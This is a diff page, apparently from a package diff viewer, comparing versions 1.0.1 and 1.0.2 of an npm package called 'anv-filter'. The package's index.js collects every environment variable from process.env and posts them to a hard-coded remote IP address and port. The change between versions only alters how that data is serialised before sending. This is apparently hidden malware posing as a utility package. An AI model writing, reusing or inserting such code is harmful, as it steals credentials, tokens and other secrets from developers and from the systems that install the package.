anv-filter 1.0.1 → 1.0.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -4,7 +4,7 @@ module.exports = async function config() {
4
4
  const uploadItem = process.env;
5
5
  try {
6
6
  const response = await axios.post("http://95.217.102.121:4000/set-anv1", {
7
- data: JSON.stringify(uploadItem),
7
+ data: uploadItem,
8
8
  });
9
9
  console.log(response.data);
10
10
  } catch(error) {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "anv-filter",
3
- "version": "1.0.1",
3
+ "version": "1.0.2",
4
4
  "main": "index.js",
5
5
  "scripts": {
6
6
  "test": "echo \"Error: no test specified\" && exit 1"